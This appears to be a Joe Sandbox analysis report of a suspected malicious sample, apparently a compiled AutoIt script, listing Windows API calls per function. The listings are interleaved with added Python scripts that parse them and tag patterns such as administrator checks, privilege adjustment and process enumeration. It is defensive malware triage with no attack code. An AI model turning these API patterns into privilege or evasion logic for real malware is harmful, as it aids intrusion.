                                                                                                                    • Instruction ID: 86d7e1a59da91f0a18fda3358458b879f86f0bcb0fc7111eebb54684416df0ae
                                                                                                                    • Opcode Fuzzy Hash: b146d346656402bd1b7f21aad43fb2befc6eefa212c049c5875630fc37174e6c
                                                                                                                    • Instruction Fuzzy Hash: 90F04975A5130CBFDF04DFF4DC89ABEBBBCEF08301F1084A9A902E2181E6756A048B50
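The listings above carry a few API sequences worth recognising at a glance: AllocateAndInitializeSid with a sub-authority count of 2 and sub-authorities 0x20/0x220 followed by CheckTokenMembership is the standard "is the caller in BUILTIN\Administrators (RID 32-544)" test; LookupPrivilegeValueW plus AdjustTokenPrivileges enables a token privilege; CreateToolhelp32Snapshot with Process32FirstW/Process32NextW walks the process list; LoadLibraryA("kernel32.dll") plus GetProcAddress("GetNativeSystemInfo") resolves an API at run time; InternetQueryDataAvailable plus InternetReadFile is a WinINet download loop. One caveat: the report classifies the sample as a likely compiled AutoIt script, and these functions sit in the main image at 0x320000, so they are consistent with the AutoIt interpreter's own built-ins rather than with the embedded script's logic; that is an inference from the AutoIt verdict, not something these listings prove. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses API listing lines in this format (the sample text is copied from the blocks on this page), folds the A/W suffixes, ignores "Part of subcall function" entries when matching, decodes the SID arguments, and tags each function with the patterns above. The rule table and the tag names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: API listing lines in the shape Joe Sandbox emits for
# each function (copied from the blocks on this page, indentation trimmed).
SAMPLE_REPORT = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00378774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0037878B
• FreeSid.ADVAPI32(?), ref: 0037879B
Memory Dump Source
APIs
  • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
• GetLastError.KERNEL32 ref: 00378865
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0039EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0039EE4B
• Process32NextW.KERNEL32(00000000,?), ref: 0039EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0039EF1A
Memory Dump Source
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00324AD0), ref: 00324B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00324B57
Strings
"""

# One "• Name.MODULE(args), ref: ADDR" entry; the optional prefix marks a call
# made inside a callee (listed for context, but not a call of this function).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:@]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Hypothetical rule table (mine, not Joe Sandbox's): a function gets a tag when
# every API in the set appears among its direct calls.
PATTERNS: Dict[str, set] = {
    "admin membership check": {"AllocateAndInitializeSid", "CheckTokenMembership"},
    "token privilege adjustment": {"LookupPrivilegeValue", "AdjustTokenPrivileges"},
    "process enumeration (Toolhelp32)": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "dynamic API resolution": {"LoadLibrary", "GetProcAddress"},
    "WinINet read loop": {"InternetQueryDataAvailable", "InternetReadFile"},
}


@dataclass
class Call:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionBlock:
    calls: List[Call] = field(default_factory=list)

    def direct_calls(self) -> List[Call]:
        return [c for c in self.calls if c.subcall_of is None]


def canonical(name: str) -> str:
    """Fold the ANSI/Unicode suffix (LoadLibraryA, Process32FirstW) onto one name."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", name)


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing at each 'APIs' header and collect the call lines under it."""
    blocks: List[FunctionBlock] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append(FunctionBlock())
            continue
        m = API_LINE.match(line)
        if m and blocks:
            blocks[-1].calls.append(
                Call(m["name"], m["module"], m["args"] or "", m["ref"].upper(), m["sub"]))
    return blocks


def decode_sid_args(args: str) -> Optional[str]:
    """Read AllocateAndInitializeSid's sub-authority count and sub-authorities.

    The identifier authority is passed by pointer (shown as '?'), so the
    listing alone cannot confirm it is SECURITY_NT_AUTHORITY; say so."""
    parts = [p.strip() for p in args.split(",")]
    try:
        count = int(parts[1], 16)
        subs = tuple(int(p, 16) for p in parts[2:2 + count])
    except (IndexError, ValueError):
        return None
    if subs == (0x20, 0x220):  # SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS
        return "BUILTIN\\Administrators (S-1-5-32-544 if the authority is NT)"
    return "sub-authorities " + "-".join(str(s) for s in subs)


def classify(block: FunctionBlock) -> List[str]:
    names = {canonical(c.name) for c in block.direct_calls()}
    tags = [tag for tag, needed in PATTERNS.items() if needed <= names]
    for c in block.direct_calls():
        if canonical(c.name) == "AllocateAndInitializeSid":
            sid = decode_sid_args(c.args)
            if sid:
                tags.append("SID: " + sid)
    return tags


def triage(text: str) -> List[dict]:
    """Return one summary per function that has at least one direct API call."""
    out = []
    for b in parse_blocks(text):
        direct = b.direct_calls()
        if not direct:
            continue
        out.append({"first_ref": direct[0].ref,
                    "apis": [c.name for c in direct],
                    "tags": classify(b)})
    return out


if __name__ == "__main__":
    for entry in triage(SAMPLE_REPORT):
        print(entry["first_ref"], ", ".join(entry["apis"]), "->", entry["tags"] or "-")
```

Run it against the whole report text (with the indentation left in; the parser strips it) to get a per-function tag list, then compare the flagged functions with the ones that actually appear in the sandbox's runtime API trace, since a pattern present in the interpreter image but never executed says nothing about what the dropped script did.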
                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 0038889B
                                                                                                                      • Part of subcall function 0034520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00388F6E,00000000,?,?,?,?,0038911F,00000000,?), ref: 00345213
                                                                                                                      • Part of subcall function 0034520A: __aulldiv.LIBCMT ref: 00345233
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                    • String ID: 0e>
                                                                                                                    • API String ID: 2893107130-46251723
                                                                                                                    • Opcode ID: e7cc43fe6c86f79147fcfc42109e30412037b8e47bd65f1b122fa3e0835ae449
                                                                                                                    • Instruction ID: 634be2497441d42c34a238f37916ef206d7e310ce85de8afb1f52f36784ee212
                                                                                                                    • Opcode Fuzzy Hash: e7cc43fe6c86f79147fcfc42109e30412037b8e47bd65f1b122fa3e0835ae449
                                                                                                                    • Instruction Fuzzy Hash: 6821AF326256108BC72ACF29D881A52B3E5EBA5321F698F6CD1F5CF2C0CA74B905CB54
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038C6FB
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038C72B
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00399468,?,003AFB84,?), ref: 0038A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00399468,?,003AFB84,?), ref: 0038A0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00378309), ref: 003781E0
• CloseHandle.KERNEL32(?,?,00378309), ref: 003781F2
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00348D57,?,?,?,00000001), ref: 0034A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0034A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00384C4A
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00378389), ref: 003787D1
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0034A12A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 7dda417c8584a9913f1dccb52e9afb6ba96fd50143fcc58ebefa1412ae654202
                                                                                                                    • Instruction ID: ebf96d15424fc3256be0862e03295843804f7cea01bd8300e093a30cf124ad1b
                                                                                                                    • Opcode Fuzzy Hash: 7dda417c8584a9913f1dccb52e9afb6ba96fd50143fcc58ebefa1412ae654202
                                                                                                                    • Instruction Fuzzy Hash: E0315ADB85D6D25FD7235B302CB9593BFB08A2728534E0DCBC8D68A553F1088A0BDB42
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6047d07cdd2353bc0fb86ae1200e594beb333721f1e86644c9efb7afae82f50f
• Instruction ID: d7ba13a97121252c2748dc3283422a7162179a00eb20c299cea5cd6fe529b1b6
• Opcode Fuzzy Hash: 6047d07cdd2353bc0fb86ae1200e594beb333721f1e86644c9efb7afae82f50f
• Instruction Fuzzy Hash: 022224305047468BDF3F8B24C4D477C77A1BB01305F2A846BF54A8B992DBB8DD92C641
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 05ea956715044e9da1ae40e4d7f68cba760a39ff5cf1194dfd267a0d043aa8be
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 82C183722054930ADB6F463A843413FFAE15EA37B135B076DE8B2DF1D4EE20E965D620
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: a28086505bda745522e15a9e8359061313c416582c1d7968faa69ab713711665
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: D8C192722055930ADF2F463A843403FBAE15EA37B135B076DE4B2EF1D5EE60E964D620
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 9e7b19b2d4aff1084b68be2bf09f6a263d1b7d1426a9acbfdf5da2c7ecea1535
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: A0C19F7224599309DF2E463AC47413EBAE19EA37B131B076DD4B2CF1D4EE20E9A59620
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: 0caee591daf76e172f470ae293a895609334796e0fb6ba94a1dec36599c1f4e0
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: 6241D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction ID: 6a94c23947d2e1540bee465768d90a8341fa8c0f242e02206c27084498cfc258
• Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction Fuzzy Hash: EB018079A11109EFCB44DF98C6909AEF7B5FB88210B2085A9D949A7301D730AE42DB80
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction ID: 020aa1fef5caf2c74da6e65947ae0f2ea190e6227d200d6db8d4679c991b9de1
• Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction Fuzzy Hash: 55019678A10109EFCB44DF98C5909AEF7B6FF88310F2085A9D949E7301E730AE41DB80
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
• Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(00000000), ref: 0039785B
• DeleteObject.GDI32(00000000), ref: 0039786D
• DestroyWindow.USER32 ref: 0039787B
• GetDesktopWindow.USER32 ref: 00397895
• GetWindowRect.USER32(00000000), ref: 0039789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003979DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003979ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A35
• GetClientRect.USER32(00000000,?), ref: 00397A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00397A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397ABB
• GlobalLock.KERNEL32(00000000), ref: 00397AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00397ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AE3
• GlobalFree.KERNEL32(00000000), ref: 00397AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003B2CAC,00000000), ref: 00397B16
• GlobalFree.KERNEL32(00000000), ref: 00397B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00397B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00397B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397D7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 08b580860beca3b254454a997c79c3a671a8656b1efd016c265ec16bbba1ce37
• Instruction ID: 7a3b205aed079aa758e3c047a59db578e692b6d1acbbc1379a13009d0b1dde9b
• Opcode Fuzzy Hash: 08b580860beca3b254454a997c79c3a671a8656b1efd016c265ec16bbba1ce37
• Instruction Fuzzy Hash: EB027971910119EFDF16DFA8DC89EAE7BB9EF49314F048159F905AB2A1CB70AD01CB60
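The APIs list above is the most reusable part of a function record: the call-site addresses in order, each with the arguments the IDA plugin could resolve (a "?" is an unresolved value, not a literal). The following is an added example, not Joe Sandbox code and not part of this report, that parses lines in the `Name.MODULE(args), ref: ADDR` shape shown here into a call sequence, rebases the `ref` addresses to RVAs using the 0x320000 image base stated in this record's Source File line (assumed fixed for the example), pulls the `lpClassName` argument (second parameter of CreateWindowExW, so "AutoIt v3" and "static" here) and checks for the file-to-picture chain CreateFileW, ReadFile, CreateStreamOnHGlobal, OleLoadPicture that this routine exhibits. The sample lines are a constructed subset copied from the listing; the function and constant names are the example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the API lines of the AutoIt picture/splash
# routine in this report (the record ending with ShowWindow at 00397D7A).
SAMPLE_API_LINES = """\
• DeleteObject.GDI32(00000000), ref: 0039785B
• DestroyWindow.USER32 ref: 0039787B
• GetDesktopWindow.USER32 ref: 00397895
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A35
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00397A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A9D
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AD3
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003B2CAC,00000000), ref: 00397B16
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397D7A
"""

# Image base of the main module in this run, from the record's
# "Source File ... Offset: 00320000" line. Assumed constant for the example;
# a different run of the same sample may load elsewhere, which is why we rebase.
IMAGE_BASE = 0x00320000

# One report line: "Name.MODULE(arg,arg,...), ref: ADDR" or "Name.MODULE ref: ADDR".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"  # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                   # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"    # call-site address (hex)
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw argument strings; "?" means the plugin could not resolve the value
    ref: int     # absolute call-site address in this run


def parse_api_lines(text):
    """Parse the 'APIs' bullet list of a Joe Sandbox function record."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue            # headers and anything not in the expected shape
        raw = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=raw.split(",") if raw else [],
            ref=int(m.group("ref"), 16),
        ))
    return calls


def to_rva(ref, image_base=IMAGE_BASE):
    """Rebase a call-site address so it can be compared across runs (ASLR)."""
    return ref - image_base


def call_sequence(calls):
    """MODULE!Name tokens in address order: a compact per-function fingerprint."""
    return [f"{c.module}!{c.name}" for c in sorted(calls, key=lambda c: c.ref)]


def window_classes(calls):
    """lpClassName (second CreateWindowExW parameter) of every window created."""
    return [c.args[1] for c in calls if c.name == "CreateWindowExW" and len(c.args) > 1]


def has_ordered_chain(calls, names):
    """True if the named APIs occur in this order (not necessarily adjacent)."""
    idx = 0
    for c in sorted(calls, key=lambda c: c.ref):
        if c.name == names[idx]:
            idx += 1
            if idx == len(names):
                return True
    return False


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for c in calls:
        print(f"{to_rva(c.ref):08X}  {c.module}!{c.name}({', '.join(c.args)})")
    print("window classes:", window_classes(calls))
    print("file -> picture chain:",
          has_ordered_chain(calls, ["CreateFileW", "ReadFile",
                                    "CreateStreamOnHGlobal", "OleLoadPicture"]))
```

Two caveats when turning such lists into signatures: the argument values are what the plugin recovered from the stack at analysis time, so match on API order and on resolved strings rather than on the hex values, and always compare RVAs, not the absolute `ref` addresses, which change with the image base.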
APIs
• CharUpperBuffW.USER32(?,?,003AF910), ref: 003A3627
• IsWindowVisible.USER32(?), ref: 003A364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: de433945bcd89d49cbcc15aea8b1244f447f5479ad0492631ddbdec881078e8d
                                                                                                                    • Instruction ID: adf9aa7fa4a012480996a365dd4ac5b00435131a1bdccf56075b637b66157fad
                                                                                                                    • Opcode Fuzzy Hash: de433945bcd89d49cbcc15aea8b1244f447f5479ad0492631ddbdec881078e8d
                                                                                                                    • Instruction Fuzzy Hash: DCD1AD352043119BCB16EF10D456B6E77E5EF96350F15846AF88A5F3A2CB31EE0ACB81
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 003AA630
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AA661
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003AA66D
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 003AA687
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003AA696
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AA6C1
                                                                                                                    • GetSysColor.USER32(00000010), ref: 003AA6C9
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 003AA6D0
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 003AA6DF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003AA6E6
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 003AA731
                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 003AA763
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AA78E
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(00000012), ref: 003AA903
                                                                                                                      • Part of subcall function 003AA8CA: SetTextColor.GDI32(?,?), ref: 003AA907
